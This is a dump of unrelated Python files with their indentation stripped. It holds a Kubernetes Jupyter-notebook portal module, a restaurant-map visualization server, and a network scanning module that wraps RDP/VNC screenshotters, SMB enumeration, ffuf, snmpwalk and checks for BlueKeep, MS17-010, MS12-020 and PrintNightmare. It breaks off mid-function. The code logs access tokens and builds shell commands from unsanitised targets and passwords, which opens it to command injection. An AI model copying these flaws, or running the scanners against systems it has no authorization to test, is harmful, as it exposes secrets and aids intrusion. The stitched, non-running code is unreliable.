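#   window.start()           # begin sliding the window in a daemon thread
#   window.increase_total()  # record a call
#   window.increase_fail()   # record a failure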
|
k8s_api.py
|
import yaml
import time
import datetime
import threading
import os
import re
import string
import urllib.parse
from base64 import b64encode
from datetime import timezone
from jinja2 import Environment, FileSystemLoader, select_autoescape
from kubernetes import client, config
from portal import logger
from portal import app
templates = Environment(loader=FileSystemLoader("portal/yaml"), autoescape=select_autoescape())
namespace = app.config.get("NAMESPACE")
domain_name = app.config.get('DOMAIN_NAME')
ingress_class = app.config.get('INGRESS_CLASS')
gpu_available = app.config.get("GPU_AVAILABLE")
config_file = app.config.get("KUBECONFIG")
k8s_charset = set(string.ascii_lowercase + string.ascii_uppercase + string.digits + '_' + '-' + '.')
class k8sException(Exception):
pass
def load_kube_config():
try:
if config_file:
config.load_kube_config(config_file = config_file)
logger.info("Loaded kubeconfig from file %s" %config_file)
else:
config.load_kube_config()
logger.info("Loaded default kubeconfig file")
logger.info("Using namespace %s" %namespace)
logger.info("Using domain name %s" %domain_name)
logger.info("GPU is available as a resource" if gpu_available else "GPU is not available as a resource")
logger.info("Using kubernetes.io/ingress.class %s" %ingress_class)
except:
logger.error("Error loading kubeconfig")
config.load_kube_config()
def start_notebook_manager():
t = threading.Thread(target=manage_notebooks)
t.start()
logger.info("Started k8s notebook manager")
def manage_notebooks():
time.sleep(10)
while True:
pods = get_pods()
for pod in pods:
if has_notebook_expired(pod):
try:
logger.info("Notebook %s in namespace %s has expired" %(pod.metadata.name, namespace))
remove_notebook(pod.metadata.name)
except:
logger.info('Error removing notebook %s during management cycle' %pod.metadata.name)
time.sleep(1800)
def generate_token():
token_bytes = os.urandom(32)
b64_encoded = b64encode(token_bytes).decode()
return b64_encoded
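# Note: 32 random bytes always base64-encode to a 44-character token string.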
def create_pod(notebook_id, display_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration, token):
try:
api = client.CoreV1Api()
template = templates.get_template("pod.yaml")
cpu_limit = cpu * 2
memory_limit = memory * 2
pod = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
display_name=display_name,
username=username,
globus_id=globus_id,
token=token,
cpu_request=cpu,
cpu_limit=cpu_limit,
memory_request=f"{memory}Gi",
memory_limit=f"{memory_limit}Gi",
gpu_request=gpu,
gpu_limit=gpu,
gpu_available=gpu_available,
gpu_memory=gpu_memory,
image=image,
days=time_duration))
api.create_namespaced_pod(namespace=namespace, body=pod)
except Exception as err:
logger.error('Error creating pod %s' %notebook_id)
logger.error(str(err))
raise k8sException('Error creating pod %s' %notebook_id)
def create_service(notebook_id, image):
try:
api = client.CoreV1Api()
template = templates.get_template("service.yaml")
service = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
image=image))
api.create_namespaced_service(namespace=namespace, body=service)
except:
logger.error('Error creating service %s' %notebook_id)
raise k8sException('Error creating service %s' %notebook_id)
def create_ingress(notebook_id, username, image):
try:
api = client.NetworkingV1Api()
template = templates.get_template("ingress.yaml")
ingress = yaml.safe_load(
template.render(
domain_name=domain_name,
ingress_class=ingress_class,
namespace=namespace,
notebook_id=notebook_id,
username=username,
image=image))
api.create_namespaced_ingress(namespace=namespace,body=ingress)
except:
logger.error('Error creating ingress %s' %notebook_id)
raise k8sException('Error creating ingress %s' %notebook_id)
def create_secret(notebook_id, username, token):
try:
api = client.CoreV1Api()
template = templates.get_template("secret.yaml")
sec = yaml.safe_load(
template.render(
namespace=namespace,
notebook_id=notebook_id,
username=username,
token=token))
api.create_namespaced_secret(namespace=namespace, body=sec)
except:
logger.error('Error creating secret %s' %notebook_id)
raise k8sException('Error creating secret %s' %notebook_id)
def supports_image(image):
images = [
'ivukotic/ml_platform:latest',
'ivukotic/ml_platform:conda',
'ivukotic/ml_platform_auto:latest',
'ivukotic/ml_platform_auto:conda',
'hub.opensciencegrid.org/usatlas/ml-platform:latest',
'hub.opensciencegrid.org/usatlas/ml-platform:conda'
]
return image in images
def notebook_id_available(notebook_id):
try:
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace, label_selector="instance={0}".format(notebook_id))
if not pods or len(pods.items) == 0:
return True
except:
logger.error('Error checking whether notebook name %s is available' %notebook_id)
raise k8sException('Error checking whether notebook name %s is available' %notebook_id)
def cpu_request_valid(cpu):
if cpu >=1 and cpu <= 4:
return True
return False
def memory_request_valid(memory):
if memory >=1 and memory <= 16:
return True
return False
def gpu_request_valid(gpu):
if gpu >=0 and gpu <= 7:
return True
return False
def validate(notebook_name, notebook_id, username, cpu, memory, gpu, gpu_memory, image, time_duration):
if " " in notebook_name:
logger.warning('The name %s has whitespace' %notebook_name)
raise k8sException('The notebook name cannot have any whitespace')
if len(notebook_name) > 30:
logger.warning('The name %s has more than 30 characters' %notebook_name)
raise k8sException('The notebook name cannot exceed 30 characters')
if not set(notebook_name) <= k8s_charset:
logger.warning('The name %s has invalid characters' %notebook_name)
raise k8sException('Valid characters are a-zA-Z0-9 and ._-')
if not supports_image(image):
logger.warning('Docker image %s is not supported' %image)
raise k8sException('Docker image %s is not supported' %image)
if not notebook_id_available(notebook_id):
logger.warning('The name %s is already taken' %notebook_name)
raise k8sException('The name %s is already taken' %notebook_name)
if not cpu_request_valid(cpu):
logger.warning('The request of %d CPUs is outside the bounds [1, 4]' %cpu)
raise k8sException('The request of %d CPUs is outside the bounds [1, 4]' %cpu)
if not memory_request_valid(memory):
logger.warning('The request of %d GB is outside the bounds [1, 16]' %memory)
raise k8sException('The request of %d GB is outside the bounds [1, 16]' %memory)
if not gpu_request_valid(gpu):
logger.warning('The request of %d GPUs is outside the bounds [0, 7]' %gpu)
raise k8sException('The request of %d GPUs is outside the bounds [0, 7]' %gpu)
if not gpu_memory or gpu_memory not in (4864, 40536):
logger.warning('The gpu_memory value has to be 4864 or 40536')
raise k8sException('The gpu_memory value has to be 4864 or 40536')
def create_notebook(notebook_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration):
notebook_id = notebook_name.lower()
validate(notebook_name, notebook_id, username, cpu, memory, gpu, gpu_memory, image, time_duration)
token = generate_token()
logger.info("The token for %s is %s" %(notebook_name, token))
create_pod(notebook_id, notebook_name, username, globus_id, cpu, memory, gpu, gpu_memory, image, time_duration, token)
create_service(notebook_id, image)
create_ingress(notebook_id, username, image)
create_secret(notebook_id, username, token)
logger.info('Created notebook %s' %notebook_name)
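# Hypothetical example call (all argument values are placeholders for illustration):
#   create_notebook("MyNotebook", "jdoe", "globus-id", cpu=2, memory=4, gpu=1,
#                   gpu_memory=4864, image="ivukotic/ml_platform:latest", time_duration=24)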
def get_creation_date(pod):
return pod.metadata.creation_timestamp
def get_expiration_date(pod):
try:
if hasattr(pod.metadata, 'labels') and 'time2delete' in pod.metadata.labels:
creation_ts = pod.metadata.creation_timestamp
duration = pod.metadata.labels['time2delete']
pattern = re.compile(r"ttl-\d+")
if pattern.match(duration):
hours = int(duration.split("-")[1])
expiration_date = creation_ts + datetime.timedelta(hours=hours)
return expiration_date
except:
logger.error('Error getting expiration date for notebook %s in namespace %s' %(pod.metadata.name, namespace))
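# For example, a pod labeled time2delete="ttl-168" that was created on
# 2021-01-01T00:00Z would be considered expired after 2021-01-08T00:00Z (168 hours later).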
def get_creation_timestamp(pod):
creation_date = get_creation_date(pod)
if creation_date:
return creation_date.timestamp()
return -1
def get_expiration_timestamp(pod):
expiration_date = get_expiration_date(pod)
if expiration_date:
return expiration_date.timestamp()
return -1
def has_notebook_expired(pod):
exp_date = get_expiration_date(pod)
if exp_date:
return datetime.datetime.now(timezone.utc) > exp_date
return False
def get_hours_remaining(pod):
try:
exp_date = get_expiration_date(pod)
now_date = datetime.datetime.now(timezone.utc)
diff = exp_date - now_date
return int(diff.total_seconds() / 3600)
except:
logger.error('Error getting the hours remaining')
def get_pod_status(pod):
try:
if notebook_closing(pod):
return '--'
return pod.status.phase
except:
logger.error('Error getting status for pod %s' %pod.metadata.name)
def get_certificate_status(pod):
try:
if notebook_closing(pod):
return '--'
net = client.NetworkingV1Api()
notebook_name = pod.metadata.name
ingress = net.read_namespaced_ingress(notebook_name, namespace)
secretName = ingress.spec.tls[0].secret_name
objs = client.CustomObjectsApi()
cert = objs.get_namespaced_custom_object(group="cert-manager.io", version="v1", name=secretName, namespace=namespace, plural="certificates")
for condition in cert['status']['conditions']:
if condition['type'] == 'Ready':
return 'Ready' if condition['status'] == 'True' else 'Not ready'
return 'Unknown'
except:
logger.error("Error getting certificate status for notebook %s" %notebook_name)
def notebook_closing(pod):
try:
if pod.metadata.deletion_timestamp:
return True
return False
except:
logger.error('Error checking whether notebook is closing in pod %s' %pod.metadata.name)
def get_notebook_status(pod):
try:
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
if notebook_closing(pod):
return 'Removing notebook...'
elif pod_status == 'Pending':
return 'Pod starting...'
elif cert_status != 'Ready':
return 'Waiting for certificate...'
elif pod_status == 'Running':
core_v1_api = client.CoreV1Api()
log = core_v1_api.read_namespaced_pod_log(pod.metadata.name, namespace=namespace)
if re.search("Jupyter Notebook.*is running at.*", log) or re.search("Jupyter Server.*is running at.*", log):
return 'Ready'
else:
return 'Notebook loading...'
else:
return pod_status
except:
logger.error('Error getting status for notebook %s' %pod.metadata.name)
return 'Error'
def get_detailed_status(pod):
try:
if notebook_closing(pod):
return None
detailed_status = ['', '', '', '']
for cond in pod.status.conditions:
if cond.type == 'PodScheduled' and cond.status == 'True':
detailed_status[0] = 'Pod scheduled.'
elif cond.type == 'Initialized' and cond.status == 'True':
detailed_status[1] = 'Pod initialized.'
elif cond.type == 'Ready' and cond.status == 'True':
detailed_status[2] = 'Pod ready.'
elif cond.type == 'ContainersReady' and cond.status == 'True':
detailed_status[3] = 'Containers ready.'
cert_status = get_certificate_status(pod)
if cert_status != 'Ready':
detailed_status.append('Waiting for certificate...')
nbstatus = get_notebook_status(pod)
if nbstatus == 'Notebook loading...':
detailed_status.append('Waiting for Jupyter notebook server...')
elif nbstatus == 'Ready':
detailed_status.append('Jupyter notebook server started.')
return detailed_status
except:
logger.error("Error getting detailed status for pod %s" %pod.metadata.name)
def get_token(notebook_name):
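    # Note: the Kubernetes API returns Secret.data values base64-encoded; callers that
    # need the raw token value should decode it accordingly.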
try:
api = client.CoreV1Api()
sec = api.read_namespaced_secret(notebook_name, namespace)
return sec.data['token']
except:
logger.error("Error getting secret for notebook %s" %notebook_name)
def get_display_name(pod):
try:
if hasattr(pod.metadata, 'labels') and 'display-name' in pod.metadata.labels:
return pod.metadata.labels['display-name']
return pod.metadata.name
except:
logger.error('Error getting value for display-name in pod %s' %pod.metadata.name)
def get_owner(pod):
try:
return pod.metadata.labels['owner']
except:
logger.error('Error getting value for owner in pod %s' %pod.metadata.name)
def get_url(pod):
try:
if notebook_closing(pod):
return None
api = client.NetworkingV1Api()
notebook_name = pod.metadata.name
ingress = api.read_namespaced_ingress(notebook_name, namespace)
token = get_token(notebook_name)
url = 'https://' + ingress.spec.rules[0].host + '?' + urllib.parse.urlencode({'token': token})
return url
except:
logger.error('Error getting URL for pod %s' %notebook_name)
def get_memory_request(pod):
try:
val = pod.spec.containers[0].resources.requests['memory']
return val[:-2] + ' GB'
except:
logger.error('Error getting the memory request for a pod')
def get_cpu_request(pod):
try:
return pod.spec.containers[0].resources.requests['cpu']
except:
logger.error('Error getting the CPU request for a pod')
def get_gpu_request(pod):
try:
return pod.spec.containers[0].resources.requests['nvidia.com/gpu']
except:
logger.error('Error getting the GPU request for a pod')
def get_gpu_memory_request(pod):
try:
val = float(pod.spec.node_selector['nvidia.com/gpu.memory'])/1000
return str(val) + ' GB'
except:
logger.error('Error getting the GPU memory request for a pod')
def get_pods():
try:
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace)
return pods.items
except:
logger.error('Error getting pods')
return []
def get_pod(name):
try:
core_v1_api = client.CoreV1Api()
return core_v1_api.read_namespaced_pod(name, namespace)
except:
logger.info('Pod %s does not exist' %name)
return None
def get_user_pod(name, username):
try:
core_v1_api = client.CoreV1Api()
pod = core_v1_api.read_namespaced_pod(name, namespace)
if pod.metadata.labels['owner'] == username:
return pod
else:
logger.error('Pod %s is not owned by user %s' %(name, username))
return None
except:
logger.info('Pod %s does not exist' %name)
return None
def get_user_pods(username):
try:
user_pods = []
core_v1_api = client.CoreV1Api()
pods = core_v1_api.list_namespaced_pod(namespace)
for pod in pods.items:
try:
if pod.metadata.labels['owner'] == username:
user_pods.append(pod)
except:
logger.error('Error processing pod %s' %pod.metadata.name)
return user_pods
except:
logger.error('Error getting user pods')
return []
def get_notebooks(username):
user_pods = get_user_pods(username)
notebooks = []
for pod in user_pods:
try:
name = pod.metadata.name
display_name = get_display_name(pod)
url = get_url(pod)
creation_date = get_creation_timestamp(pod)
expiration_date = get_expiration_timestamp(pod)
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
notebook_status = get_notebook_status(pod)
detailed_status = get_detailed_status(pod)
memory_request = get_memory_request(pod)
cpu_request = get_cpu_request(pod)
gpu_request = get_gpu_request(pod)
gpu_memory_request = get_gpu_memory_request(pod)
hours_remaining = get_hours_remaining(pod)
notebooks.append(
{'name': name,
'display_name': display_name,
'namespace': namespace,
'username': username,
'url': url,
'pod_status': pod_status,
'cert_status': cert_status,
'notebook_status': notebook_status,
'detailed_status': detailed_status,
'creation_date': creation_date,
'expiration_date': expiration_date,
'memory_request': memory_request,
'cpu_request': cpu_request,
'gpu_request': gpu_request,
'gpu_memory_request': gpu_memory_request,
'hours_remaining': hours_remaining}
)
except:
logger.error('Error processing Jupyter notebook %s' %pod.metadata.name)
return notebooks
def get_all_notebooks():
pods = get_pods()
notebooks = []
for pod in pods:
try:
name = pod.metadata.name
display_name = get_display_name(pod)
owner = get_owner(pod)
url = get_url(pod)
creation_date = get_creation_timestamp(pod)
expiration_date = get_expiration_timestamp(pod)
pod_status = get_pod_status(pod)
cert_status = get_certificate_status(pod)
notebook_status = get_notebook_status(pod)
memory_request = get_memory_request(pod)
cpu_request = get_cpu_request(pod)
gpu_request = get_gpu_request(pod)
gpu_memory_request = get_gpu_memory_request(pod)
hours_remaining = get_hours_remaining(pod)
notebooks.append(
{'name': name,
'display_name': display_name,
'namespace': namespace,
'username': owner,
'url': url,
'pod_status': pod_status,
'cert_status': cert_status,
'notebook_status': notebook_status,
'creation_date': creation_date,
'expiration_date': expiration_date,
'memory_request': memory_request,
'cpu_request': cpu_request,
'gpu_request': gpu_request,
'gpu_memory_request': gpu_memory_request,
'hours_remaining': hours_remaining}
)
except:
logger.error('Error processing Jupyter notebook %s' %pod.metadata.name)
return notebooks
def remove_notebook(notebook_id):
core_v1_api = client.CoreV1Api()
core_v1_api.delete_namespaced_pod(notebook_id, namespace)
core_v1_api.delete_namespaced_service(notebook_id, namespace)
networking_v1_api = client.NetworkingV1Api()
networking_v1_api.delete_namespaced_ingress(notebook_id, namespace)
core_v1_api.delete_namespaced_secret(notebook_id, namespace)
logger.info("Removing notebook %s in namespace %s" %(notebook_id, namespace))
def remove_user_notebook(notebook_name, username):
    notebook_id = notebook_name.lower()
    try:
        core_v1_api = client.CoreV1Api()
networking_v1_api = client.NetworkingV1Api()
pod = core_v1_api.read_namespaced_pod(notebook_id, namespace)
if pod.metadata.labels['owner'] == username:
core_v1_api.delete_namespaced_pod(notebook_id, namespace)
core_v1_api.delete_namespaced_service(notebook_id, namespace)
networking_v1_api.delete_namespaced_ingress(notebook_id, namespace)
core_v1_api.delete_namespaced_secret(notebook_id, namespace)
logger.info('Removing notebook %s' %notebook_id)
else:
logger.warning('Notebook %s does not belong to user %s' %(notebook_id, username))
raise k8sException('Notebook %s does not belong to user %s' %(notebook_id, username))
except:
logger.error(f"Error removing pod {notebook_id} in namespace {namespace}")
raise k8sException('Error removing notebook %s' %notebook_id)
def get_autogenerated_notebook_name(username):
try:
for i in range(1, 100):
nbname = "{0}-notebook-{1}".format(username, i)
if notebook_id_available(nbname):
return nbname
except k8sException as e:
logger.error(str(e))
except:
logger.error("Error getting autogenerated notebook name")
|
__init__.py
|
import http.server
import json
import webbrowser
import socket
from abstractions import *
from utils import distance
def draw_map(centroids, restaurants, ratings):
"""Write a JSON file containing inputs and load a visualization.
Arguments:
centroids -- A sequence of positions
restaurants -- A sequence of restaurants
ratings -- A dictionary from restaurant names to ratings
"""
data = []
locations = set()
for restaurant in restaurants:
p = tuple(restaurant_location(restaurant))
cluster = min(enumerate(centroids), key=lambda v: distance(p, v[1]))[0]
name = restaurant_name(restaurant)
rating = ratings[name]
if p not in locations:
data.append({
'x': p[0],
'y': p[1],
'weight': rating,
'name': name,
'cluster': cluster,
})
locations.add(p)
with open('visualize/voronoi.json', 'w') as f:
json.dump(data, f)
load_visualization('voronoi.html')
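# Minimal usage sketch (assumes the restaurants were built via the abstractions module;
# the centroid coordinates below are placeholders):
#
#   centroids = [[37.78, -122.42], [37.76, -122.44]]
#   ratings = {restaurant_name(r): 4.0 for r in restaurants}
#   draw_map(centroids, restaurants, ratings)
#
# This writes visualize/voronoi.json and serves visualize/voronoi.html locally.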
port = 8000
base_url = 'http://localhost:{0}/visualize/'.format(port)
def load_visualization(url):
"""Load the visualization located at URL."""
if not check_port():
print('Address already in use! Check if recommend.py is running in a separate terminal.')
return
server = start_threaded_server()
webbrowser.open_new(base_url + url)
try:
server.join()
except KeyboardInterrupt:
print('\nKeyboard interrupt received, exiting.')
class SilentServer(http.server.SimpleHTTPRequestHandler):
def log_message(self, format, *args):
return
def check_port():
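    # connect_ex() returns 0 when the connection succeeds, i.e. something is already
    # listening on the port, so a falsy return value here means the address is in use.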
sock = socket.socket()
success = sock.connect_ex(('localhost', port))
sock.close()
return success
def start_server():
server, handler = http.server.HTTPServer, SilentServer
httpd = server(('', port), handler)
sa = httpd.socket.getsockname()
print('Serving HTTP on', sa[0], 'port', sa[1], '...')
print('Type Ctrl-C to exit.')
try:
httpd.serve_forever()
finally:
httpd.server_close()
import threading
def start_threaded_server():
thread = threading.Thread(target=start_server)
thread.daemon = True
thread.start()
return thread
|
scrapers.py
|
#!/usr/bin/env python3
from scanners import Job
from multiprocessing import Process, Queue
import os, sys, re, json
from os.path import join
import collections
from log import log
from helpers import dict2str
debug=True
def d(m):
if debug:
sys.stderr.write("> %s\n"%m)
# Generic scrape job: runs a shell script against one target at a time, expecting the
# script to save its output as e.g. 1.2.3.4.png, and generates a results JSON file
# that can then be read back. Both the output filename pattern and the command line
# can be overridden by subclasses.
class ScraperJob(Job):
def __init__(self, processes=4):
super().__init__()
self.path = 'results'
self.scantype = 'scraper'
# override
self.commandline = lambda scheme, target, port: target
self.setuphook = None # set to an argumentless lambda if necessary
self.posthook = None
        self.output_filename_pattern = r'([0-9.]+)\.png'
self.port = '-1'
self.scheme = ''
def scan(self):
d("scraper job targets %s"%str(self.targets))
if len(self.targets) == 0:
d("scraper job: no targets, not doing shit")
return
os.chdir(self.path) # the uuid id of the scan job
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output') # reasonable, don't change
if self.setuphook:
self.setuphook()
# be careful if changing the queue size. Some jobs, such as the rdp screenshot,
# create actual (offscreen) X11 windows that are then screenshot. Having more
# than one job in parallel can cause a fuckup.
targetqueue = Queue(maxsize = 1)
processes = []
def scrapetask(target):
targetqueue.put(target)
c=self.commandline(self.scheme, target, self.port)
d(c)
os.system(c)
if self.posthook:
self.posthook()
targetqueue.get()
for t in self.targets:
p = Process(target = lambda: scrapetask(t))
p.start()
processes.append(p)
for p in processes:
p.join()
self.postprocess()
sys.stderr.write("scraper task done\n")
def postprocess(self):
results = []
re_filename = re.compile(self.output_filename_pattern)
for x in os.listdir('output'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[0]
results.append({'host': ip, 'scantype': self.scantype,'port': self.port, 'file': join('output',x)})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': self.scantype,
'jobid': self.ident,
'target': self.targets }
if self.port != '-1':
meta['port'] = self.port
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
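# A minimal subclass sketch showing the pieces the generic job expects to be set
# (the script name and output pattern below are hypothetical, not part of this repo):
#
#   class PingSweep(ScraperJob):
#       def __init__(self, targets, processes=4):
#           super().__init__(processes)
#           self.targets = targets
#           self.scantype = 'pingsweep'
#           self.commandline = lambda scheme, target, port: \
#               "../../scanners/ping.sh %s > output/out.ping.%s" % (target, target)
#           self.output_filename_pattern = r'out\.ping\.([0-9.]+)'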
# simple enough job to be handled by the superclass
class RdpScreenshot(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
super().__init__(processes)
self.targets = targets
d("rdpscreenshot u=%s d=%s p=%s targets %s"%(user,domain,password,str(self.targets)))
self.scantype='rdpscreenshot'
# run the rdp-screenshotter script with an offscreen window
if type(domain) == str and type(user) == str and type(password) == str\
and len(domain) > 0 and len(user) > 0:
self.commandline = lambda scheme, target, port: "timeout 15 xvfb-run -a ../../RDP-screenshotter.sh %s '%s' '%s' '%s'"%(target, domain, user, password)
else:
self.commandline = lambda scheme, target, port: "timeout 15 xvfb-run -a ../../RDP-screenshotter.sh %s"%(target)
        self.output_filename_pattern = r'([0-9.]+)\.png'
class VncScreenshot(ScraperJob):
def __init__(self, targets, port='5901', processes=4, password = ''):
super().__init__(processes)
self.targets = targets
self.scantype = 'vncscreenshot'
self.port = port
        if type(password) == str and len(password) > 0:
            self.commandline = lambda scheme, target, port: "timeout 5 ../../scanners/vnc.py %s::%s %s output/%s.png "%(target, port, password, target)
        else:
            self.commandline = lambda scheme, target, port: "timeout 5 ../../scanners/vnc.py %s::%s output/%s.png "%(target, port, target)
        self.output_filename_pattern = r'([0-9.]+)\.png'
class WebScreenshot(ScraperJob):
def __init__(self, targets, scheme, port, processes=4):
super().__init__(processes)
self.targets = targets
self.port = port
self.scheme = scheme
d("webscreenshot targets %s"%str(self.targets))
self.path = 'results'
self.scantype='webscreenshot'
self.targets = targets
self.commandline = lambda scheme, target, port: "QT_QPA_PLATFORM=offscreen webscreenshot -r phantomjs %s://%s:%s >/dev/null 2>&1"%(scheme,target,port)
self.commandline = lambda scheme, target, port: 'mkdir -p screenshots;timeout 5 xvfb-run -a phantomjs --ignore-ssl-errors=true --ssl-protocol=any "/usr/local/lib/python3.8/dist-packages/webscreenshot/webscreenshot.js" url_capture=%s://%s:%s output_file="screenshots/%s_%s_%s.png" width=1200 height=800 format=png quality=75 ajaxtimeout=1400 maxtimeout=1800'%(scheme, target, port, scheme, target, port)
        self.output_filename_pattern = r'([a-z]+)_([0-9.]+)_([0-9]+)\.png'
# overridden here because of the different path and different regex to match results files
def postprocess(self):
results = []
re_filename = re.compile(self.output_filename_pattern)
for x in os.listdir('screenshots'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[1]
port = m.groups()[2]
results.append({'host': ip, 'scantype': 'web-screenshot', 'port': port, 'file': join('screenshots',x)})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'webscreenshot',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class SmbEnum(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
        super().__init__(processes)
self.path = 'results'
self.scantype='smbenum'
self.targets = targets
self.port = '445'
if type(domain) == str and type(user) == str and type(password) == str\
and len(domain) > 0 and len(user) > 0:
self.commandline = lambda scheme, target, port:\
"../../scanners/smbenum.sh -a %s %s %s %s"%\
(domain,user,password, target)
else:
self.commandline = lambda scheme, target, port:\
"../../scanners/smbenum.sh %s"%\
(target)
        self.output_filename_pattern = r'out\.enum\.([0-9.]+)'
class Ffuf(ScraperJob):
def __init__(self, targets, processes=4, port='80'):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ffuf'
self.targets = targets
self.port = port
        self.output_filename_pattern = r'out\.ffuf\.([0-9.]+)'
def scan(self, scheme='http'):
self.scheme = scheme
if self.port == '443':
self.scheme = 'https'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
os.mkdir('output')
targetqueue = Queue(maxsize = 8)
processes = []
def enumtask(target):
targetspec = self.scheme + '://'
targetspec += target
if self.port:
targetspec += ':%s'%self.port
targetspec += '/FUZZ'
targetqueue.put(target)
# replace the quickhits with your wordlist of choice
c="ffuf -mc 200,204,307,418 -w ../../resources/quickhits.txt -u %s -o output/out.ffuf.%s 2>output/err.%s"%(targetspec, target, target)
sys.stderr.write('%s\n'%c)
os.system(c)
targetqueue.get()
for t in self.targets:
p = Process(target = lambda: enumtask(t))
p.start()
processes.append(p)
for p in processes:
p.join()
self.postprocess()
sys.stderr.write("ffuf task done\n")
def postprocess(self):
results = []
        re_filename = re.compile(r'out\.ffuf\.([0-9.]+)')
for x in os.listdir('output'):
m = re_filename.match(x)
if m and m.groups():
ip = m.groups()[0]
fuf = json.loads(open('output/%s'%x,'r').read())
results.append({'host': ip, 'scantype': 'ffuf', 'port': self.port, 'output': fuf})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ffuf',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Snmpwalk(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.path = 'results'
self.scantype='snmpwalk'
self.targets = targets
self.port = '161'
self.commandline = lambda scheme, target, port: \
"snmpwalk -c public -v1 %s 2>output/err.%s | tee output/out.snmpwalk.%s"%\
(target, target, target)
        self.output_filename_pattern = r'out\.snmpwalk\.([0-9.]+)'
class Bluekeep(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='bluekeep'
self.targets = targets
def scan(self):
self.port = '3389'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
os.system('../../scanners/blue.sh %s |tee output.txt'%' '.join(self.targets))
self.postprocess()
sys.stderr.write("bluekeep task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
        re_shit = re.compile(r'\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
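        # For the sample line above, match.groups() yields
        # ('192.168.9.5', 'Cannot reliably check exploitability.')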
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
results.append({'host': m.groups()[0], 'scantype': 'bluekeep', 'status': m.groups()[1], 'port': '3389'})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'bluekeep',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Ms17_010(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ms17_010'
self.targets = targets
def scan(self):
self.port = '445'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/ms17_010.sh %s > output.txt'%' '.join(self.targets)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("ms17_010 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
        re_shit = re.compile(r'\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'ms17_010', 'status': ''.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ms17_010',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Ms12_020(ScraperJob):
def __init__(self, targets, processes=4):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='ms12_020'
self.targets = targets
def scan(self):
self.port = '3389'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/ms12_020.sh %s > output.txt'%' '.join(self.targets)
log(commandline)
os.system(commandline)
self.postprocess()
sys.stderr.write("ms12_020 task done\n")
def postprocess(self):
results = []
#line looks like:
# [*] 192.168.9.5:3389 - Cannot reliably check exploitability.
        re_shit = re.compile(r'\[.\]\s([^:]*):[0-9]+\s+-\s(.*)')
hostresults = collections.defaultdict(list)
for line in open('output.txt','r').readlines():
m = re_shit.match(line.strip())
if m and m.groups():
hostresults[m.groups()[0]].append(m.groups()[1])
for key in hostresults.keys():
results.append({'host': key, 'scantype': 'ms12_020', 'status': ''.join(hostresults[key]), 'port': self.port})
f = open('results.json','w')
f.write(json.dumps(results, indent=4, sort_keys=True))
meta = { 'scantype': 'ms12_020',
'jobid': self.ident,
'target': self.targets,
'port': self.port }
open('info.json','w').write(json.dumps(meta, indent=4,sort_keys=True))
f.close()
class Printnightmare(ScraperJob):
def __init__(self, targets, processes=4, domain=None, user=None, password=None):
super().__init__()
self.targets = targets
self.path = 'results'
self.scantype='cve_2021_1675'
self.targets = targets
self.domain = domain
self.user = user
self.password = password
def scan(self):
self.port = '445'
os.chdir(self.path)
try:
os.mkdir(self.ident)
except:
pass
os.chdir(self.ident)
targetqueue = Queue(maxsize = 8)
commandline = '../../scanners/printnightmare.sh %s %s %s %s > output.txt'%(self.domain, self.user, self.password, ' '.join(self.targets))
log(commandline)
os.system(commandline)
